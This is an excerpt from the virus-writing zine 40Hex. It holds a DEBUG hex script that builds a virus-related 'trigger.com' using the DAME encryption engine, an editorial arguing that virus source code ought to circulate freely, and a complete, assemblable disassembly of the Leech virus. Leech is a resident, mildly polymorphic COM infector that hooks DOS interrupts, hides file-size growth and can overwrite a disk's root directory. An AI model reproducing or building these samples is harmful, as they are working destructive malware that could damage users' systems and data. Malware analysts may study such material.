40Hex Number 11 Volume 3 Issue 2
----begin trigger.scr------------------------------------------
n trigger.com
e 0100 E8 6E 00 00 54 72 69 67 67 65 72 20 62 79 20 44
e 0110 61 72 6B 20 41 6E 67 65 6C 20 6F 66 20 50 68 61
e 0120 6C 63 6F 6E 2F 53 6B 69 73 6D 0D 0A 55 74 69 6C
e 0130 69 73 69 6E 67 20 44 61 72 6B 20 41 6E 67 65 6C
e 0140 27 73 20 4D 75 6C 74 69 70 6C 65 20 45 6E 63 72
e 0150 79 70 74 6F 72 20 28 44 41 4D 45 29 0D 0A 0D 0A
e 0160 00 72 FA 0E 1F BA 00 B8 B8 40 00 8E C0 26 81 3E
e 0170 63 FC 5D B8 F0 0C BB 41 44 CD 21 81 FB 48 47 75
e 0180 3C 1E 06 0E 1F 33 C0 8D 76 5E 8E C0 33 FF B9 08
e 0190 00 F3 A7 74 08 40 3D 00 A0 72 EC EB 1C 89 86 AE
e 01A0 00 8E D8 C6 06 73 00 CB 55 BD 80 FF EB 00 9A 01
e 01B0 00 00 00 5D C6 06 73 00 1F 07 1F EB 7F B8 90 4B
e 01C0 CD 21 3B C3 74 76 1E 06 8C D8 48 8E D8 81 2E 03
e 01D0 00 80 01 81 2E 12 00 80 01 8E 06 12 00 0E 1F 33
e 01E0 FF 8D 76 FD B9 D1 04 F3 A5 33 C0 8E D8 83 2E 13
e 01F0 04 06 BF 1F 02 BE 84 00 A5 A5 FA 9C 9C 58 80 CC
e 0200 01 50 8C 06 06 00 C7 06 04 00 7F 01 9D B4 30 9C
e 0210 FF 1E 84 00 9D 26 C5 36 1F 02 8B FE AD 26 A3 F0
e 0220 01 AD 26 A3 F5 01 AC 26 A2 FA 01 1E 06 1F 07 B0
e 0230 EA AA B8 E2 01 AB 8C D8 AB FB 07 1F 83 FC FE 75
e 0240 0B 8D B6 64 01 BF 00 01 57 A5 A5 C3 8C D8 05 10
e 0250 00 2E 01 86 7A 01 2E 03 86 72 01 8E D0 2E 8B A6
e 0260 74 01 2E FF AE 78 01 CD 20 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55
e 0280 8B EC 50 8B 46 04 2E 3B 06 21 02 73 0B 2E A3 21
e 0290 02 8B 46 02 2E A3 1F 02 58 5D CF 55 8B EC 50 8C
e 02A0 C8 3B 46 04 74 F2 8B 46 04 2E 3B 06 21 02 75 14
e 02B0 8B 46 02 2E 3B 06 1F 02 72 0A 2D 05 00 2E 3B 06
e 02C0 1F 02 76 D4 06 57 FC 2E C4 3E 1F 02 B0 EA AA B8
e 02D0 E2 01 AB 8C C8 AB 5F 07 81 66 06 FF FE EB B9 8B
e 02E0 D8 CF 3D 90 4B 74 F8 1E 57 2E C5 3E 1F 02 C7 05
e 02F0 34 12 C7 45 02 34 12 C6 45 04 12 5F 1F FC 3D 00
e 0300 4B 74 48 1E 50 33 C0 8E D8 FA C7 06 04 00 9B 01
e 0310 8C 0E 06 00 FB 9C 58 80 CC 01 50 9D 58 1F EA 00
e 0320 00 00 00 9C 2E FF 1E 1F 02 C3 5A 59 B8 01 57 E8
e 0330 F1 FF B4 3E E8 EC FF B8 01 43 5A 1F 59 E8 E3 FF
e 0340 07 1F 5F 5E 5D 5B 5A 59 58 EB B8 50 51 52 53 55
e 0350 56 57 1E 06 B8 00 43 E8 C9 FF 51 1E 52 B8 01 43
e 0360 33 C9 E8 BE FF B8 02 3D E8 B8 FF 72 CA 93 B8 00
e 0370 57 CD 21 51 52 B4 3F B9 18 00 0E 1F 0E 07 BA 67
e 0380 01 8B F2 E8 9D FF 72 A2 BF F9 09 B9 0C 00 56 57
e 0390 F3 A5 5F 5E B8 02 42 33 C9 99 CD 21 81 3D 4D 5A
e 03A0 75 2E 81 3E 77 01 53 50 74 80 A3 FD 09 89 16 FB
e 03B0 09 B9 10 00 F7 F1 2B 06 01 0A 89 16 0D 0A A3 0F
e 03C0 0A 87 CA A3 07 0A C7 06 09 0A 53 50 B0 02 EB 34
e 03D0 50 B9 04 00 33 D2 AC 02 D0 E2 FB 58 0A D2 74 C8
e 03E0 BA 18 00 3B C2 73 07 B8 00 42 33 C9 CD 21 8B C8
e 03F0 FE C5 2D 03 00 50 B0 E9 AA 58 AB 02 C4 04 E9 F6
e 0400 D8 AA B0 03 98 53 87 CB 33 F6 BF 11 0C B9 D1 04
e 0410 F3 A5 50 E8 67 00 58 BA 11 0C B9 A1 09 BE 91 0A
e 0420 BF 11 0A E8 A2 00 51 81 3E F9 09 4D 5A 75 21 8B
e 0430 16 FB 09 A1 FD 09 81 C1 A1 09 03 C1 83 D2 00 B9
e 0440 00 02 F7 F1 0B D2 74 01 40 A3 FD 09 89 16 FB 09
e 0450 FF D7 59 5B B4 40 BA 91 0A E8 C7 FE B4 40 B9 A1
e 0460 09 BA 11 0C E8 BC FE B8 00 42 33 C9 99 CD 21 B4
e 0470 40 B9 18 00 BA F9 09 E8 A9 FE E9 AD FE 52 51 53
e 0480 B4 2C CD 21 E4 40 8A E0 E4 40 33 C1 33 D0 EB 1C
e 0490 52 51 53 E4 40 05 00 00 BA 00 00 B9 07 00 D1 E0
e 04A0 D1 D2 8A D8 32 DE 79 02 FE C0 E2 F2 A3 96 03 89
e 04B0 16 99 03 8A C2 5B 59 5A C3 87 00 86 84 85 03 07
e 04C0 0F 1F 5F 5E 5A 59 5B 58 FC 50 53 51 52 56 57 E8
e 04D0 07 00 5F 5E 5A 5B 5B 58 C3 FC 50 B8 A7 09 97 AB
e 04E0 96 AB AB 92 AB 93 AB 87 CA E8 44 02 B9 1A 00 F3
e 04F0 AB E8 9C FF 25 FC FF 59 33 C8 E8 75 02 83 E3 03
e 0500 8A 87 BE 03 98 03 D0 F7 D0 23 D0 8B C2 AB D1 E8
e 0510 F6 C5 40 74 02 D1 E8 F6 C5 10 75 02 F7 D8 AB 92
e 0520 F6 C5 20 75 02 F7 D8 AB E8 65 FF AB B8 84 84 AA
e 0530 57 AB AA 5F E8 33 02 78 0B E8 00 02 AA E8 50 FF
e 0540 A3 F1 09 4F 47 EB 03 E8 07 02 E8 EF 01 3C 03 72
e 0550 F6 AA E8 15 02 78 04 E8 E2 01 AA E8 D2 01 8B 3E
e 0560 A9 09 E8 16 02 BE F5 09 56 E8 06 02 83 E3 03 8A
e 0570 00 98 A8 80 75 F3 80 8F F5 09 80 8B F0 FE 84 B1
e 0580 09 03 DB 8B 97 ED 09 C6 06 A1 09 00 E8 6F 02 E8
e 0590 E9 01 E8 06 01 51 80 E1 FC E8 AC 02 59 89 3E A7
e 05A0 09 5E BA 04 00 AC A8 80 74 B4 4A 75 F8 BE A7 09
e 05B0 BF A3 09 A5 A5 C6 06 A2 09 00 E8 65 00 F6 C5 40
e 05C0 74 08 C6 06 A2 09 02 E8 58 00 BB A3 09 51 80 E1
e 05D0 FC E8 58 00 59 B8 FC C3 AB BE BB 09 8B 3E AD 09
e 05E0 51 E8 19 00 59 BB A5 09 E8 41 00 E8 8A 01 89 3E
e 05F0 A9 09 BE CD 09 2B 3E AB 09 03 3E AF 09 F6 C5 20
e 0600 74 04 03 3E ED 09 2B 3E F1 09 8B 4C FE E3 08 97
e 0610 97 AD 97 01 05 E2 F9 8B 3E A9 09 8B CF 2B 0E AB
e 0620 09 C3 E8 84 00 E8 DA 00 E8 7E 00 C3 8B 7F 04 53
e 0630 C6 06 A1 09 00 A0 F7 09 25 07 00 BA 02 00 F6 C5
e 0640 40 74 02 D1 E2 F6 C5 20 74 02 F7 DA E8 F9 02 B2
e 0650 75 A0 F6 09 25 07 00 3C 04 74 26 52 BA 01 00 F6
e 0660 C5 10 74 19 3C 01 75 13 E8 FF 00 78 0E 5A E8 01
e 0670 01 87 DA 80 E2 02 80 CA E0 EB 06 F7 DA E8 C8 02
e 0680 5A 5B 8B 07 2B C7 48 48 86 E0 8A C2 F6 C4 80 75
e 0690 05 58 58 E9 2C FE AB 89 7F 04 C3 C6 06 A1 09 0A
e 06A0 89 3E A9 09 8B 3E A7 09 C3 8B 3E A9 09 E8 CB 00
e 06B0 A0 F8 09 25 07 00 3C 04 74 E1 E8 B5 00 80 FB C0
e 06C0 77 D9 E8 13 00 E8 DB 00 E8 D0 FF 51 80 E1 FC FF
e 06D0 50 01 59 89 3E A7 09 C3 C6 06 A1 09 00 E8 8A 00
e 06E0 78 08 E8 8D 00 BE 07 09 EB 15 E8 85 00 83 E3 07
e 06F0 80 FB 04 74 F5 80 BF B1 09 00 74 EE BE 3A 09 87
e 0700 D3 C3 8B 3E A9 09 E8 72 00 A0 F7 09 25 07 00 BB
e 0710 B6 03 D7 BD CB 09 E8 BF FF E8 0B 00 E8 84 00 BD
e 0720 B9 09 E8 02 00 EB A1 50 AC 98 03 F0 58 46 46 C3
e 0730 33 C0 BF B1 09 AB AB 40 AB 48 AB C3 E8 51 FD 25
e 0740 07 00 8B F0 80 BC B1 09 00 75 F1 FE 84 B1 09 C3
e 0750 92 8B F0 C6 84 B1 09 00 C3 50 51 57 BF B1 09 B9
e 0760 08 00 33 C0 F2 AE 5F 59 58 C3 50 E8 22 FD 0B C0
e 0770 58 C3 93 E8 1A FD 93 C3 E8 00 00 C6 06 A1 09 00
e 0780 E8 00 00 E8 D3 FF 75 EF F6 C1 02 74 EA 50 52 E8
e 0790 FE FC 92 E8 A6 FF E8 B8 FF BE EE 08 EB 07 56 E8
e 07A0 E1 FF 5E 50 52 56 51 91 AC 98 91 E8 C4 FF 23 D9
e 07B0 59 FE 06 A1 09 80 3E A1 09 0A 72 02 33 DB 53 FF
e 07C0 10 5B 5E 5A 58 C3 BE 3A 09 83 E2 07 EB D5 BE 07
e 07D0 09 EB D0 92 24 07 BB FF 08 D7 AA C3 92 25 0F 00
e 07E0 0C 70 AB C3 0A C0 78 04 04 50 AA C3 05 30 FF EB
e 07F0 0A 0A C0 78 04 04 58 AA C3 B4 8F E9 F0 00 BE 55
e 0800 09 EB 9B E8 6C FF 53 2B D3 E8 F2 FF 5A EB 23 3C
e 0810 04 73 35 50 52 E8 38 00 5A 58 86 F2 EB 30 E8 51
e 0820 FF 53 33 D3 E8 D7 FF 5A E9 96 00 52 8B D0 E8 9B
e 0830 00 5A E9 13 01 D1 CA E8 C4 FF EB 07 D1 C2 E8 BD
e 0840 FF 0C 08 B4 D1 E9 A6 00 04 B8 AA 92 AB C3 04 04
e 0850 04 B0 8A E2 AB C3 BE 66 09 EB A6 50 92 E8 84 FF
e 0860 58 EB 8E B4 8B EB 6D E8 00 FF 78 EA BE 6F 09 E9
e 0870 2C FF 52 50 52 E8 6C FF 58 E8 68 FF 58 E8 71 FF
e 0880 58 E9 6D FF E8 D2 FE 75 14 52 50 E8 AE FE E8 D6
e 0890 FF 5A E8 D7 FF 5A 92 E8 CD FF E9 B3 FE 0A C0 78
e 08A0 0A 3A C2 7F 02 86 C2 0A D2 74 06 86 C2 B4 87 EB
e 08B0 35 04 90 AA C3 E8 BA FE 53 33 D3 E8 03 00 5A EB
e 08C0 00 BE 78 09 E9 D7 FE 0C 30 E9 8B 00 BE 81 09 E9
e 08D0 CC FE B4 33 0A C0 78 09 0A D2 78 0A E8 8B FE 78
e 08E0 05 86 C2 80 EC 02 D0 E0 D0 E0 D0 E0 0A C2 0A C0
e 08F0 78 02 0C C0 86 E0 F6 C4 40 75 1D F6 C1 01 75 05
e 0900 50 B0 2E AA 58 AB 2E 8B 76 00 03 F6 2E 89 7A 02
e 0910 2E FF 46 00 A0 A2 09 98 AB C3 BE 86 09 E9 7E FE
e 0920 B4 03 EB B0 BE 8B 09 E9 74 FE B4 2B EB A6 E8 50
e 0930 00 4A EB 14 E8 45 00 42 EB 0E E8 35 FE 53 2B D3
e 0940 E8 05 00 5A EB 02 F7 DA 0B D2 75 01 C3 BE 90 09
e 0950 E9 4B FE 0A C0 74 0E 0A C0 78 02 04 C0 B4 81 E8
e 0960 8C FF 92 AB C3 B0 05 AA EB F8 F7 DA 0B D2 74 DC
e 0970 0A C0 74 04 04 28 EB DF B0 2D EB EB 50 04 08 EB
e 0980 01 50 0A C0 79 07 B4 FF E8 63 FF 58 C3 04 40 AA
e 0990 58 C3 BB 56 07 BE 67 07 EB 0F BB D2 07 EB 08 BB
e 09A0 20 08 EB 03 BB 2A 08 8B F3 E8 AD FD 75 2E 50 56
e 09B0 E8 89 FD E8 A0 FE 5E 5A 92 52 FF D6 5A E9 90 FD
e 09C0 BB C1 07 BE CC 07 E8 90 FD 75 11 50 56 E8 6C FD
e 09D0 E8 2B FE 92 5E 58 52 FF D6 5A EB E1 FF E3 BB 48
e 09E0 08 BE 1A 08 EB E0 BB FE 06 BE 67 07 EB D8 0E 77
e 09F0 06 77 06 C6 06 C6 06 CE 06 CE 06 D3 06 DC 06 F8
e 0A00 F5 F9 FC FD FB CC F0 0E C1 07 FE 06 6C 08 48 08
e 0A10 7C 08 81 08 41 07 43 07 0E C1 07 6C 08 48 08 48
e 0A20 08 7C 08 81 08 41 07 43 07 0E C1 07 48 08 6C 08
e 0A30 6C 08 81 08 7C 08 43 07 41 07 06 CC 07 56 07 24
e 0A40 08 1A 08 06 CC 07 CC 07 24 08 1A 08 06 CC 07 CC
e 0A50 07 1A 08 24 08 0E 48 07 E6 08 03 07 0F 07 1E 07
e 0A60 2B 07 35 07 3C 07 06 63 07 63 07 92 08 5B 07 06
e 0A70 9D 07 9D 07 72 07 84 07 06 C7 07 C7 07 C0 08 B5
e 0A80 07 02 D2 07 9A 08 02 20 08 9F 08 02 2A 08 A4 08
e 0A90 0E 53 08 53 08 DE 08 6A 08 2E 08 34 08 3A 08 3A
e 0AA0 08
rcx
09A1
w
q
-end trigger.scr---------------------------------------------------------------
40Hex Issue 11 Volume 3 Number 2 File 004
40-Hex Editorial
Virus Censorship
by DecimatoR
Recently in the comp.virus echo of Usenet there was a discussion
entitled "40 Hex Censorship". A few people were complaining about this
magazine being censored by the anti-virus community, and on Internet
itself. I found this thread interesting, and figured I'd voice my opinions
on it here, where it counts.
As many of you know, 40-Hex is one of the most popular underground mags.
I was actually told by a European Anti-Virus researcher that 40-Hex was
regarded as the best VX magazine in existance by most of the anti-virus
community. Of course, I was quite happy to hear this. (Who wouldn't be?)
But I also couldn't help wondering, how could a magazine like 40-Hex, with no
real distribution system, be the most popular? It got me thinking, and I
realized that we provide, in great detail, some of the most recent news, and
developments in the virus community. Anyone can publish source code and
hex dumps, but we take it a bit further. 40-Hex is more than just a how-to
magazine, it's a publication which delves into details, world wide
developments, and never-before distributed source code with new and
interesting programming techniques. It's more than a source of viruses; it's
a source of _information_.
This also got me thinking, about the actual distribution system of
40-Hex. Each issue is distributed on two, and ONLY two bulletin boards -
Digital Warfare and Liquid Euphoria. From there, it is passed rapidly across
the country, and, soon after, around the world. Unfortunately, 40-Hex never
seems to make it to a LARGE portion of the population who want it - the folks
who hang out on in the comp.virus echo of Usenet. A few issues back, I
posted a note there, asking for input on a survey I was conducting. Over
half of the replies I received didn't even answer my questions - all the
folks wanted to know was WHERE could they get their hands on 40-Hex? After a
little digging, I found 2 sites which allowed 40-Hex to be posted for
anonymous FTP. Within a month, both sites had removed the magazine.
Censorship? You bet. See, the anti-virus folks on Usenet feel that this
magazine is BAD. After all, we publish source code which any virus author
can learn by. We encourage people to learn new programming techniques. We
tell the truth about how viruses work, and we're not afraid to give people
code which shows HOW viruses do what they do, so that anyone who wishes to
write a virus has the KNOWLEDGE to do so.
But does this make us bad? Let's look at it again, in a slightly
different perspective:
We publish source code which any anti-virus author can learn by. We encourage
people to learn new programming techniques. We tell the truth about how
viruses work, and we're not afraid to give people code which shows HOW viruses
do what they do, so that anyone who wishes to write anti-virus software has the
KNOWLEDGE to do so.
Hmmm... now do we seem so bad? With the addition of a few "anti"s in that
last paragraph, we turned 40-Hex around - from a bad underground magazine to
a beneficial wealth of information. Interesting, eh?
This seems to be where the Vesselin Bontchev's of the world have a serious
problem seeing the forest, because of the trees. Bontchev has often
proclaimed, quite loudly, and in no uncertain terms, that virus code should
NEVER, NEVER, NEVER, UNDER _ANY_ CIRCUMSTANCES, BE DISTRIBUTED TO ANYONE!
Anyone, that is, except an anti-virus researcher like himself.
Double standard? Yes.
A typical scenario on the newsgroup reads like this:
Joe Unknown: Hi, I'm interested in writing an anti-virus package, and need
to obtain viruses which I can experiment and work with. Where
can I find them?
Joe Established-AV-Person: You can't. I don't know you, and no one else does
either. Therefore, you cannot be trusted, and you
may not recieve virus code. You should be ashamed
for asking! You probably just want to learn to
write viruses so you can wreak havoc on all
computers everywhere! Hmmmph!
Yes, folks, it IS this bad. The anti-virus guys talk of "ethical
standards" which say that they just can't give out virus code, except to
other established AV people. Ethical standards? DOUBLE STANDARDS!!! What
would happen, if they DID give their viruses to "unknown" people who wanted
them? Would massive virus infections result? Maybe. Would new anti-virus
software packages be created? Probably. But will the AV guys give anyone a
chance? Hardly.
It's this attitude which upsets a lot of people. And one of them was
upset enough to finally ask WHY 40-Hex was so censored on the net. Of course,
he got the "ethical standard" reply. But the true fact is - people WANT this
(and any other) fine VX magazine! The Nuke Infojournals, ARCV newsletters,
the Crypt newsletters... I've had people ask me time and time again WHERE
they can find them on the Internet. And I've told them, time and time again,
"You can't. Sorry."
Most of you who read this mag are involved in either of 3 groups:
The Virus underground, System Security, or Anti-Virus research. Where did
YOU obtain your copy of 40-Hex? A BBS? A friend? A disk you found lying in
the computer room? Probably a BBS. Certainly not Internet. The poor folks
on Internet are missing out on a LOT of good information, all because a
handful of self-appointed experts decided that CENSORSHIP was better than
KNOWLEDGE. Of course, if I were to post this fact in comp.virus, my message
would never get out. Why? Because the group is moderated by an individual
who ranks right up there with the rest of the Censors. Any message even
vaguely requesting a source for viruses is killed before it gets out. And
certainly, any post containing source code, or a way to obtain viruses is
nuked before it's ever seen by anyone. THE COMP.VIRUS ECHO IS ONE OF THE
MOST HEAVILY CENSORED NEWSGROUPS ON USENET! Does this bother you? It
certainly bothers me! INFORMATION IS POWER, FOLKS! Stupidity is NOT!
Recently I had a long conversation with Alan Solomon, head of S & S
International, publisher of Dr. Solomon's Anti-Virus Toolkit. It was a
pleasant conversation, and Dr. Solly is a very nice person to talk to.
Although we obviously don't see eye-to-eye on certain topics, we came to a
general understanding - he does anti-virus work to help other people and to
make a living. I run a virus board to pass on information and to fight
censorship. I respect him for his ideals, and I believe he respects me
for mine. Of course, he doesn't approve of what I do, but he respects my
reasons for doing it. Was an interesting conversation, I'm glad we had it.
Thanks, Alan - for everything.
Censorship of viruses, virus code, and virus mags is quite strong. Those
in the underground often don't realize how censored this material really is,
or how lucky they are to be able to obtain it with a phone call. It really
bugs me to think that people out there WANT the information contained inside
this very issue, but are unable to get it because of the closed minds of a
handful of "experts".
Wake up people! This is the 90's! This is the INFORMATION AGE!
Censorship doesn't HELP! It HARMS! Keeping people ignorant doesn't help
them, it HURTS them! Knowledge is power! FREE INFORMATION IS WHAT CYBERSPACE
IS BASED ON! Anything else is simply _wrong_.
--Dec
40Hex Issue 11 Volume 3 Number 2 File 005
Virus Spotlight on: Leech
This month's virus is a Bulgarian creation known as Leech. It is mildly
polymorphic, implementing a simple code swapping algorithm. It infects on
file executes and file closes. The infections upon file closes is especially
noteworthy; look closely at the manipulation of the system file table (and see
the related article in this issue of 40Hex for more details). This resident,
COM-specific infector also hides file length increases, although the stupid
CHKDSK error will occur.
-- Dark Angel
Phalcon/Skism
-------------------------------------------------------------------------------
.model tiny
.code
org 0
; Leech virus
; Disassembly by Dark Angel of Phalcon/Skism
; Assemble with Tasm /m Leech.asm
virlength = (readbuffer - leech)
reslength = (((encrypted_file - leech + 15) / 16) + 2)
leech:
jmp short enter_leech
filesize dw offset carrier
oldint21 dw 0, 0
oldint13 dw 0, 0
oldint24 dw 0, 0
datestore dw 0
timestore dw 0
runningflag db 1
evenodd dw 0
enter_leech:
call next
next:
pop si
mutatearea1:
cli
push ds ; Why?
pop es
mov bp,sp ; save sp
mov sp,si ; sp = offset next
add sp,encrypt_value1 - 1 - next
mutatearea2:
mov cx,ss ; save ss
mov ax,cs
mov ss,ax ; ss = PSP
pop bx ; get encryption value
dec sp
dec sp
add si,startencrypt - next
nop
decrypt:
mutatearea3:
pop ax
xor al,bh ; decrypt away!
push ax
dec sp
cmp sp,si
jae decrypt
startencrypt:
mov ax,es
dec ax
mov ds,ax ; ds->MCB
db 81h,6,3,0 ;add word ptr ds:[3],-reslength
dw 0 - reslength
mov bx,ds:[3] ; bx = memory size
mov byte ptr ds:[0],'Z' ; mark end of chain
inc ax ; ax->PSP
inc bx
add bx,ax ; bx->high area
mov es,bx ; as does es
mov ss,cx ; restore ss
add si,leech - startencrypt
mov bx,ds ; save MCB segment
mov ds,ax
mov sp,bp ; restore sp
push si
xor di,di
mov cx,virlength ; 1024 bytes
cld
rep movsb
pop si
push bx
mov bx,offset highentry
push es
push bx
retf ; jmp to highentry in
; high memory
highentry:
mov es,ax ; es->PSP
mov ax,cs:filesize
add ax,100h ; find stored area
mov di,si
mov si,ax
mov cx,virlength
rep movsb ; and restore over virus code
pop es ; MCB
xor ax,ax
mov ds,ax ; ds->interrupt table
sti
cmp word ptr ds:21h*4,offset int21 ; already resident?
jne go_resident
db 26h,81h,2eh,3,0 ;sub word ptr es:[3],-reslength
dw 0 - reslength ; alter memory size
test byte ptr ds:[46Ch],0E7h ; 1.17% chance of activation
jnz exit_virus
push cs
pop ds
mov si,offset message
display_loop: ; display ASCIIZ string
lodsb ; get next character
or al,0 ; exit if 0
jz exit_display_loop
mov ah,0Eh ; otherwise write character
int 10h
jmp short display_loop
exit_display_loop:
mov ah,32h ; Get DPB -> DS:BX
xor dl,dl
int 21h
jc exit_virus ; exit on error
call getint13and24
call setint13and24
mov dx,[bx+10h] ; first sector of root
; directory
; BUG: won't work in DOS 4+
mov ah,19h ; default drive -> al
int 21h
mov cx,2 ; overwrite root directory
int 26h
pop bx
call setint13and24 ; restore int handlers
exit_virus:
jmp returnCOM
go_resident:
db 26h, 81h, 6, 12h, 0 ;add word ptr es:12h,-reslength
dw 0 - reslength ; alter top of memory in PSP
mov bx,ds:46Ch ; BX = random #
push ds
push cs
pop ds
push cs
pop es
mov runningflag,1 ; reset flag
and bh,80h
mov nothing1,bh
mutate1:
test bl,1
jnz mutate2
mov si,offset mutatearea1
add si,evenodd
lodsb
xchg al,[si] ; swap instructions
mov [si-1],al
mutate2:
test bl,2
jnz mutate3
mov si,offset mutatearea2
add si,evenodd
lodsw
xchg ax,[si] ; swap instructions
mov [si-2],ax
mutate3:
test bl,4
jnz mutate4
mov si,offset mutatearea3
mov al,2
xor [si],al ; flip between ax & dx
xor [si+2],al
xor [si+3],al
mutate4:
test bl,8
jnz findint21
mov si,offset next
mov di,offset readbuffer
mov cx,offset enter_leech
push si
push di
lodsb
cmp al,5Eh ; 1 byte pop si?
je now_single_byte_encode
inc si ; skip second byte of two
; byte encoding of pop si
now_single_byte_encode:
push cx
rep movsb
pop cx
pop si
pop di
cmp al,5Eh ; 1 byte pop si?
je encode_two_bytes ; then change to 2
mov al,5Eh ; encode a pop si
stosb
rep movsb ; then copy decrypt over
mov al,90h ; plus a nop to keep virus
stosb ; length constant
xor ax,ax ; clear the flag
jmp short set_evenodd_flag
encode_two_bytes:
mov ax,0C68Fh ; encode a two byte form of
stosw ; pop si
rep movsb
mov ax,1 ; set evenodd flag
set_evenodd_flag:
mov cs:evenodd,ax
findint21:
mov ah,30h ; Get DOS version
int 21h
cmp ax,1E03h ; DOS 3.30?
jne notDOS33
mov ah,34h ; Get DOS critical error ptr
int 21h
mov bx,1460h ; int 21h starts here
jmp short alterint21
notDOS33:
mov ax,3521h ; just get current int 21 handler
int 21h
alterint21:
mov oldint21,bx
mov word ptr ds:oldint21+2,es
mov si,21h*4 ; save old int 21 handler
pop ds ; found in interrupt table
push si
push cs
pop es
mov di,offset topint21
movsw
movsw
pop di ; and put new one in
push ds
pop es
mov ax,offset int21
stosw
mov ax,cs
stosw
mov di,offset startencrypt
mov al,cs:encrypt_value1 ; decrypt original program code
decryptcode:
xor cs:[di],al
inc di
cmp di,offset decryptcode
jb decryptcode
returnCOM:
mov ah,62h ; Get current PSP
int 21h
push bx ; restore segment registers
mov ds,bx
mov es,bx
mov ax,100h
push ax
retf ; Return to PSP:100h
infect:
push si
push ds
push es
push di
cld
push cs
pop ds
xor dx,dx ; go to start of file
call movefilepointer
mov dx,offset readbuffer ; and read 3 bytes
mov ah,3Fh
mov cx,3
call callint21
jc exiterror
xor di,di
mov ax,readbuffer
mov cx,word ptr ds:[0]
cmp cx,ax ; check if already infected
je go_exitinfect
cmp al,0EBh ; jmp short?
jne checkifJMP
mov al,ah
xor ah,ah
add ax,2
mov di,ax ; di = jmp location
checkifJMP:
cmp al,0E9h ; jmp?
jne checkifEXE ; nope
mov ax,word ptr readbuffer+1
add ax,3
mov di,ax ; di = jmp location
xor ax,ax
checkifEXE:
cmp ax,'MZ'
je exiterror
cmp ax,'ZM'
jne continue_infect
exiterror:
stc
go_exitinfect:
jmp short exitinfect
nop
continue_infect:
mov dx,di
push cx
call movefilepointer ; go to jmp location
mov dx,virlength ; and read 1024 more bytes
mov ah,3Fh
mov cx,dx
call callint21
pop cx
jc exiterror
cmp readbuffer,cx
je go_exitinfect
mov ax,di
sub ah,0FCh
cmp ax,filesize
jae exiterror
mov dx,filesize
call movefilepointer
mov dx,virlength ; write virus to middle
mov cx,dx ; of file
mov ah,40h
call callint21
jc exitinfect
mov dx,di
call movefilepointer
push cs
pop es
mov di,offset readbuffer
push di
push di
xor si,si
mov cx,di
rep movsb
mov si,offset encrypt_value2
mov al,encrypted_file
encryptfile: ; encrypt infected file
xor [si],al
inc si
cmp si,7FFh
jb encryptfile
pop cx
pop dx
mov ah,40h ; and write it to end of file
call callint21
exitinfect:
pop di
pop es
pop ds
pop si
retn
int21:
cmp ax,4B00h ; Execute?
je execute
cmp ah,3Eh ; Close?
je handleclose
cmp ah,11h ; Find first?
je findfirstnext
cmp ah,12h ; Find next?
je findfirstnext
exitint21:
db 0EAh ; jmp far ptr
topint21 dw 0, 0
findfirstnext:
push si
mov si,offset topint21
pushf
call dword ptr cs:[si] ; call int 21 handler
pop si
push ax
push bx
push es
mov ah,2Fh ; Get DTA
call callint21
cmp byte ptr es:[bx],0FFh ; extended FCB?
jne noextendedFCB
add bx,7 ; convert to normal
noextendedFCB:
mov ax,es:[bx+17h] ; Get time
and ax,1Fh ; and check infection stamp
cmp ax,1Eh
jne exitfindfirstnext
mov ax,es:[bx+1Dh]
cmp ax,virlength * 2 + 1 ; too small for infection?
jb exitfindfirstnext ; then not infected
sub ax,virlength ; alter file size
mov es:[bx+1Dh],ax
exitfindfirstnext:
pop es
pop bx
pop ax
iret
int24:
mov al,3
iret
callint21:
pushf
call dword ptr cs:oldint21
retn
movefilepointer:
xor cx,cx
mov ax,4200h
call callint21
retn
execute:
push ax
push bx
mov cs:runningflag,0
mov ax,3D00h ; open file read/only
call callint21
mov bx,ax
mov ah,3Eh ; close file
int 21h ; to trigger infection
pop bx
pop ax
go_exitint21:
jmp short exitint21
handleclose:
or cs:runningflag,0 ; virus currently active?
jnz go_exitint21
push cx
push dx
push di
push es
push ax
push bx
call getint13and24
call setint13and24
; convert handle to filename
mov ax,1220h ; get job file table entry
int 2Fh
jc handleclose_noinfect ; exit on error
mov ax,1216h ; get address of SFT
mov bl,es:[di]
xor bh,bh
int 2Fh ; es:di->file entry in SFT
mov ax,es:[di+11h]
mov cs:filesize,ax ; save file size,
mov ax,es:[di+0Dh]
and al,0F8h
mov cs:timestore,ax ; time,
mov ax,es:[di+0Fh]
mov cs:datestore,ax ; and date
cmp word ptr es:[di+29h],'MO' ; check for COM extension
jne handleclose_noinfect
cmp byte ptr es:[di+28h],'C'
jne handleclose_noinfect
cmp cs:filesize,0FA00h ; make sure not too large
jae handleclose_noinfect
mov al,20h ; alter file attribute
xchg al,es:[di+4]
mov ah,2 ; alter open mode to read/write
xchg ah,es:[di+2]
pop bx
push bx
push ax
call infect
pop ax
mov es:[di+4],al ; restore file attribute
mov es:[di+2],ah ; and open mode
mov cx,cs:timestore
jc infection_not_successful
or cl,1Fh ; make file infected in
and cl,0FEh ; seconds field
infection_not_successful:
mov dx,cs:datestore ; restore file time/date
mov ax,5701h
call callint21
handleclose_noinfect:
pop bx
pop ax
pop es
pop di
pop dx
pop cx
call callint21
call setint13and24
retf 2 ; exit with flags intact
getint13and24:
mov ah,13h ; Get BIOS int 13h handler
int 2Fh
mov cs:oldint13,bx
mov cs:oldint13+2,es
int 2Fh ; Restore it
mov cs:oldint24,offset int24
mov cs:oldint24+2,cs
retn
setint13and24:
push ax
push si
push ds
pushf
cli
cld
xor ax,ax
mov ds,ax ; ds->interrupt table
mov si,13h*4
lodsw
xchg ax,cs:oldint13 ; replace old int 13 handler
mov [si-2],ax ; with original BIOS handler
lodsw
xchg ax,cs:oldint13+2
mov [si-2],ax
mov si,24h*4 ; replace old int 24 handler
lodsw ; with our own handler
xchg ax,cs:oldint24
mov [si-2],ax
lodsw
xchg ax,cs:oldint24+2
mov [si-2],ax
popf
pop ds
pop si
pop ax
retn
message db 'The leech live ...', 0
db 'April 1991 The Topler.'
db 0, 0, 0, 0, 0
encrypt_value1 db 0
readbuffer dw 0
db 253 dup (0)
nothing1 db 0
db 152 dup (0)
encrypt_value2 db 0
db 614 dup (0)
encrypted_file db 0
db 1280 dup (0)
carrier:
dw 20CDh
end leech
-------------------------------------------------------------------------------
40Hex Issue 11 Volume 3 Number 2 File 006
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
SFT's and Their Usage
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
By Dark Angel
Phalcon/Skism
